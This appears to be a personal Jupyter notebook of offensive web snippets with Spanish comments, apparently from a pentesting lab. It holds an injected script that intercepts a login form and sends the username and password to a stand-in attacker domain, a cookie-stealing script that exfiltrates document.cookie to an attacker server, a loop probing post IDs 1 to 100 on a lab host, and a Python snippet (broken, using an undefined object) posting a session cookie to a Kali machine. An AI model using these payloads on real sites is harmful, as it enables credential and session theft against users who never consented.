In [ ]:
<div> <script>
  document.addEventListener('DOMContentLoaded', function() {
    var form = document.forms[0];
    form.addEventListener('submit', function(event) {
      event.preventDefault();
      var user = form.elements['user'].value;
      var pass = form.elements['password'].value;
      var xhr = new XMLHttpRequest();
      xhr.open('GET', 'http://tu_dominio.com/robar_credenciales.php?user=' + user + '&pass=' + pass, true);
      xhr.send();
    });
  });
</script><div>

In [ ]:
//robo de cookies
<div>
  <script>
    // Función para enviar las cookies a un servidor controlado por ti
    function sendCookies(cookies) {
      var xhr = new XMLHttpRequest();
      xhr.open("GET", "http://tu-servidor.com/captura?cookies=" + encodeURIComponent(cookies), true);
      xhr.send();
    }

    // Llama a la función con las cookies actuales
    sendCookies(document.cookie);
  </script>
<div>

In [ ]:
                                                            
import requests

# Definir la URL base
base_url = "http://10.0.2.20/post.php?id="

# Definir el rango de IDs a verificar
id_range = range(1, 101)

# Recorrer el rango de IDs
for post_id in id_range:
    # Construir la URL completa
    url = f"{base_url}{post_id}"
    
    # Enviar la solicitud HTTP
    response = requests.get(url)
    
    # Verificar el código de estado de la respuesta
    if response.status_code == 200:
        print(f"ID {post_id} está disponible: {url}")
    else:
        print(f"ID {post_id} no está disponible: {url}")


In [ ]:
#script para que envie la cookie a tu servidor
import requests

# Recopilar la cookie
cookie = request.cookies.get('session')

# Enviar la cookie a tu Kali Linux
url = 'http://10.0.2.25:1234/cookie.py'
data = {'cookie': cookie}

response = requests.post(url, data=data)

# Mostrar el resultado
print(response.text)